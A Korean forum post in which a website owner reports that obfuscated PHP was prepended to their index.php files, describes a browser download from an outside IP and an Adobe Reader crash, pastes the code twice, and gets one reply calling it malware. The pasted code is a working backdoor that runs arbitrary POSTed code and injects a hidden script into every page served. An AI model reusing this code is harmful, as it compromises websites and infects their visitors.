인덱스 파일에 다른 코드가 덧붙여진 것 같습니다. 정보
인덱스 파일에 다른 코드가 덧붙여진 것 같습니다.본문
index.php 파일의 맨 위에 아래와 같은 코드가 4월 22일 오후 20시 16분에서 19분 사이에 덧붙여진 것 같습니다.
파일명에 'index'라는 이름이 들어간 확장자가 'php'인 파일에만 아래 내용이 붙었어요.
그리고 페이지에 들어가면 상태표시줄에 '다운로드중 ...http://94.247.2.195/news/?id=2' 이런 내용이 나오고 'adobe reader 8.0에서 문제가 있어서 창을 종료해야 합니다'라는 오류창이 뜹니다.
페이지는 좀 많이 느려진 것을 제외하면 문제가 없어 보입니다.
해킹 당한 것 같은 느낌도 드는데...
ip 주소는 조회해 봤더니 '라트비아'라는 나라던데...
혹시 아시는 분 조언 좀 부탁드립니다.
수고하세요.
-- 아래 --
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY21Da3JLWlppcFdSdCUyMDhZMHM2aHI4WTBjbUNrJTNES1AwJTJGJTJGOFkwOUtaWjRLWlolMkUybUNrNDclMkUyJTJFbUNrMXcxVzlLUDA1JTJGS1AwaldqcnFLWlp1ZVNlcm1Da3k2aCUyRVdSanNTZSUzRSUzQ3cxVyUyRldSc2NydzFXaXBXUnRXanIlM0UnKS5yZXBsYWNlKC84WTB8S1pafFNlfDZofFdqcnxXUnxLUDB8bUNrfHcxVy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
파일명에 'index'라는 이름이 들어간 확장자가 'php'인 파일에만 아래 내용이 붙었어요.
그리고 페이지에 들어가면 상태표시줄에 '다운로드중 ...http://94.247.2.195/news/?id=2' 이런 내용이 나오고 'adobe reader 8.0에서 문제가 있어서 창을 종료해야 합니다'라는 오류창이 뜹니다.
페이지는 좀 많이 느려진 것을 제외하면 문제가 없어 보입니다.
해킹 당한 것 같은 느낌도 드는데...
ip 주소는 조회해 봤더니 '라트비아'라는 나라던데...
혹시 아시는 분 조언 좀 부탁드립니다.
수고하세요.
-- 아래 --
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY21Da3JLWlppcFdSdCUyMDhZMHM2aHI4WTBjbUNrJTNES1AwJTJGJTJGOFkwOUtaWjRLWlolMkUybUNrNDclMkUyJTJFbUNrMXcxVzlLUDA1JTJGS1AwaldqcnFLWlp1ZVNlcm1Da3k2aCUyRVdSanNTZSUzRSUzQ3cxVyUyRldSc2NydzFXaXBXUnRXanIlM0UnKS5yZXBsYWNlKC84WTB8S1pafFNlfDZofFdqcnxXUnxLUDB8bUNrfHcxVy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
댓글 전체
큭 악성코드인듯한데요